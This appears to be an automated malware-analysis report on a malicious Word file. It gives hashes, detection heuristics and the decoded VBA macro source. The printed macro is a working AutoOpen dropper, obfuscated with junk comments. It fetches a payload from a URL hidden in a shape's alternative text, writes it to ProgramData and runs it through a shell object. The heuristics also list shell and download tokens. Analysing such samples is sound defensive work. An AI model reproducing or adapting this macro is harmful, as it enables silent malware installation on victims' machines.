Office (OOXML) malware analysis — malicious · c6606fe635d9f77e

MALICIOUS

Office (OOXML)

139.5 KB Created: 2020-10-06 10:11:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-09

MD5: 83bd9cb538233034f18bee34b09718c7 SHA-1: c808f5eac6667fd72720b0d4ec821ce9a0bb046a SHA-256: c6606fe635d9f77ebf10448e929c0fb91f93999bda24aed4d1b75375582468ff

170 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Generic-9823775-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Generic-9823775-0
VBA project inside OOXML medium 3 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set dyUeu = CreateObject("WinHttp.WinHttpRequest.5.1")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	11024 bytes
SHA-256: `495f0cdc8ed05fc93419297a8d832a7e8c5661534857551964a1cfeabae0cccc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mzfIb" Sub AFIbP(dTaZx, Optional ByVal lRRbi As String = "c:\programdata\OspNm.pdf") ' Dietitian spills deactivate ' Neediness acquaintance ore ' Tinkly customers hardhit clucking ' Uncrushable essences numbering abased ' Extremal ' Stereotypically entrapment ' Peeling ' Congratulating absorb ' Papers camcorder communing ' Fulminant karakul haulage ' Crumples sensibleness ' Vacuously unprofitable jellify ' Carcinomas disillusioned triglyceride inveterate repackaged ' Creditability ovation calibrated dialog interconnect ' Procreating canticles foots shaker angled crucifixes marquess ' Pawing ' Chamomile antler horrifies ' Sacrilege mass ' Notebooks tomahawks ' Radiations workmate superfluities derivative ' Miserly smirks sedges inheritors adenoid gasket ' Corpuscle introduction despise ' Manifest pronunciations raised ' Albeit besmirch peninsula poet cascade boon ' Redecoration refineries wages isolated inability dissertation icosahedral ' Chunks ignition klick pedestal ' Linking enlace roughened obliterating ' Tollgate ebony ' Typically interject ' Aunts quadrants regattas martyry whalebone ' Wanly impersonal sketchily turpentine commonalities ' Emigrate guardianship lambda ' Bogglingly epitaph spaceflight capri gossiped ' Outages mitochondria glittering ' Gravitation lissomeness outings wpBsJ = lRRbi Open wpBsJ For Output As #1 ' Mingles thespian concisely mythologies sheathing ' Bibliography ' Elope ' Gratuitous disagreed sultana ' Howsoever complements ranching ' Devastatingly cliff differ sallied Print #1, dTaZx ' Multiphase beeswax circularly dracone recounts repulsion ' Carry maydays flavours ' Quackish confronted integrating fancy tigris ' Indivisible editions weeded erasable hatchery terriers hubcaps ' Threshold fluxes textures barged voracity eigenstate ' Choirboys Close #1 End Sub ' Comrade macaroni eyelevel adapted genets ' Strikers operand ' Some preferment cradling inputs clearheaded hitch reversed ' Octogenarians painfully armada blindfolds ' Examiners maturely ' Conservatism lies superfix teddies step fourthly codename Sub AutoOpen() ' Renumbering dismissed hatful moonbeams bossier paperback levered ' Feast chalks menace ' Woods espousal temperately ' Anorexic nineteenth regimes warped mat ' Floodlights smouldering nyala symmetrising ' Eurasian bovine decency ' Flippable strays ' Summery shops ' Cubs pub swearers post forecourt ' Rosy prostitutes sweetcorn ' Waterworks believes ' Indelible pipework ' Existed workfare abortionist ' Ferrous unshared ' Yeaned glutted unexpanded ' Adenine solubility conics substitution socially ' Monocled astutely ' Inn continuum birefringence denaturing ' Genitals satanism accosting testosterone brightest ' Bowing inventing ' Confiscating announces ambuscade electorate retrieves ' Relight pig larynx ' Swarming neuter ails transverse niggling ' Aligning siphoned lamps cannibalism ' Food scriptural browsers ' Studied centipede ' Dimensional ' Peerages phenomenological ' Baffles ashtrays reversion ' Alleys winnable objectless dismally handcar ' Pleasantness calcutta ' Untidiest miracles Dim OmTDk As New StUck ' Couplet ' Foisted condenser tempests reshape ' Enfranchising yorkers dried rocs macaroon ' Anticlockwise fungicidal rhythmically landlines dTaZx = OmTDk.aoEZx() ' Epicycloid daniel ' Wards broadloom ' Commerce plumbed proletariat ' Blamelessly westerner burped woods cloudscapes ' Pushers imbecilic emanate preacher deductively AFIbP nOexE(dTaZx) ' Involves bloods baroque empty ' Aitches cajoling ' Singularity disadvantaged ' Tweeds repressed ' Professes chiming drumming backtracking ' Caressingly chinks lobelia memorial retitled constructor corrals ' Rears upgradings revalue ' Evocatively graduated miracle exploited craned ' Coulomb teething excitable peeping footpaths debacles ' Highpitched circumlocution refutation unloading keenest ' Mobilise ' Tolerable technical excavating ' Crossexamination latest scarp bEPmi fzZdP(0) + "r32 c:\programdata\OspNm.pdf", "" End Sub Function DMzgV(KTqcT, aGzbH) ' Aquarium silently ' Upstage fatuously ' Flashbacks rays snarling shrimp applet ' Maternity ionic frenziedly unaccompanied ' Spooling predominance prognoses ' Bloodthirsty subways trespass grocer DMzgV = Split(KTqcT, aGzbH) End Function Attribute VB_Name = "ulddS" ' Tucks empowered discover distorts spokespeople ' Denotations ' Unstressed persevering ' Wood laughter impulsive ' Gigantically understatement encrustation reprimand Function nOexE(ftHdb) ' Evenings extensionally ' Loses jaunty ' Tantamount pilgrims boater ' Deafest bevels outcast ' Rhein drummers unimpaired ' Auction ravishingly shouldered revives nOexE = StrConv(ftHdb, vbUnicode) ' Perused morphism rerouteing weekends ' Oration priceless dodgem ' Stagnated sedate jaywalk organist ' Tribally slams allegories ' Furtive disaffiliate glaciers ' Polytheism vandal technophobic End Function ' Comings feint roistering reprocessing spigot ' Flourishing tarantula reabsorb foreboding repossession ' Tartan proposing smudge ' Truer dewdrops unlovable ' Kalahari random Function LhKph() ' Mucous beholding ' Latecomers scrutineers fireproof dockland ' Flat plodding lemonade kite optician ' Nucleic druid unconventional reconcilable ' Answers culvert whiffs bamboo donga ' Crammer spaceage woes stainless ' Haphazard campsite splodge possum downy orangutan ' Harmonium plurality humanoid decimating ' Polyesters ' Outstrips lacquers ' Opponent ' Malign white waive compacts LhKph = ActiveDocument.shapes(1).AlternativeText End Function ' Germanium stealthy ' Magisterially compresses insecticides ' Whoa flowerless prescriptive attenuators ' Rebate quarts ' Skimp reimburses ' Eliminations gateau curtsy seesaw Function fzZdP(ULufu) ' Hullabaloo wholeheartedly ton reginas ' Rapid faceted recognisances smell ' Colourised demoralised scrappiest ' Mispronunciations cations ' Unstamped fretfulness regarded gelatin invalidation ' Remuneration refused curatorial lactation ' Doom centreing square ' Jugglers septet perishing idiom ' Revisiting eves torts respectively brown ' Coop recount landfill rerolled ' Conveying riboflavin dines contemptuous interbreed townscape ' Risk catalytic alacrity preparatory dBTpo = LhKph() Hjdyi = DMzgV(dBTpo, "kristi") KbXDU = Hjdyi(ULufu) fzZdP = KbXDU End Function Attribute VB_Name = "StUck" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False ' Evening gerontology fumbling oblivion inferred ' Electrostatic mobilised zebu cubistic sensually ' Sightlessly overrun ' Pillbox woeful replica forebodings amazement ' Apoplectic donga reaffirming Function aoEZx() ' Chewy ' Afield nudity retrievals ' Valedictory vestal jilted repercussion ' Entwining conduction boreal ' Fussier ' Crispy republics Dim dyUeu As Object ' Formidable welterweight fondant figments ' Medication detester ' Sprigs ' Birefringence neurologist ' Touchiest tractor weathermen tithes reconstructed Set dyUeu = CreateObject("WinHttp.WinHttpRequest.5.1") ' Tensor mistranslating texas overtake spilt ' Dashes microbiology blowed conquistadores flowerless ignited ' Ranch birdbaths ' Etal voluminous dispersive ' Accreditation managerially pronunciation climber prophetess assents conquered ' Swoop ' Colloid snaffle ' Mothersinlaw pugs ' Ordered plaintiffs ' Slanting solemn brushwork saturated ' Disinterestedness farriers can caribou acolyte ' Prosecuting adjacent confiscate ' Supremely beefy ' Godlike cringes vegetation ' Heretofore rifting newsagents cupidinously ' Soldiered cherryred spyhole ' Pulverisation lacks littoral stead buoys retrained aeration ingest ' Stressed ' Ineffectively baldest nomination babyish trikes flow ' Gouged sprang ' Be confuse wainscot cystine extraditable fits ' Metalled turkeys mucous ' Blackmailing modelling reprehensible youths ' Downturn leaderships refit radium spIER = fzZdP(1) ' Extendability ' Prognoses skipper ' Yorker under ruined dependants ' Fished reformer tracking lunchers legionaries ' Braids dyUeu.Open "GET", spIER, False ' Deterrents ligaments ' Transparencies forlornness blushers stoat humiliations derived ' Imagining stellated watercolour ' Peeper jurassic ' Coronaries emulsifies relied dense ' Apnoea guidebooks envelops ' Connectedness waived dyUeu.Send ' Tickles ' Globular ' Equipping gratitude knows ' Approvingly ninety hurtles ' Gingham racket aoEZx = dyUeu.responsebody End Function Attribute VB_Name = "aNVci" Sub bEPmi(dNCVH, AiRIA) ' Spiny crimson rhodesia unutterable ' Parrots hogger repositioning ' Moor sweated meditates ' Rung consoling schooling ' Note purgative ' Barrages misidentification anybody referrals ' Overcame profiteers outspoken screeching ' Deflating toadstool ' Speech militant miscalculation comprise Set bXSBQ = CreateObject(AiRIA + fzZdP(2) + "ll").exec(dNCVH) ' Creamery lumping ineffectively mapper resource transfigured ' Reproduce econometric tycoon ' Oxalate glowing scenes ' Afflicted mollifies wicker aerobatics ' Lifetaking amply moult lifetime ' Adenine controversy miniaturises photographer coup threedimensional ' Pizza suppurating manipulation enunciated ' Clambering sherry lifeline flicker miscarried ' Conjugacy delta isotropic including ' Folded destined robotic infinity divide ' Facia infiltration ' Reverberates understate booksellers ' Generalised alphabet ' Waiters ' Ratty internments grammars contradiction vestment ' Precept volunteer ' Freak cannery disastrously deadline numeral ' Stealer kindheartedness carbonyl subharmonics monitored ' Tankful lineally ' Growers motes brightened nosier ' Parochial callgirl ' Technologies ' Romancer afternoon ' Moats sportingly roarer ' Avoids ibises bluffing pachyderm tremendously complied ' Choppers tumbled steeps solutes ' Sprinkling resuscitating cockroaches centennial ' Aches sauna quadruple festered ' Pulsated inheritable amulets ' Tuppence ' Bowsprit aquariums farfetched limply noiselessly ' Miscomprehended hydra remaining ' Antiquary mafiosi despair hallway ' Molluscan holes censorship chainsmoke coerce ' Easter generalists ' Baccarat distinctively depraves cohere ' Merged beggary bashing ' Ramming fogey whipped ' Sexless reminiscing cases ' Egyptian bradawl ' Fruit flameproof hake nudists digitise End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	42496 bytes
SHA-256: `c341b18cc7222701d40bd67a2fa228ff01b21ffc649e0de6c22c262eff5cc55d`

Open this report in the interactive analyzer, or submit your own file for analysis.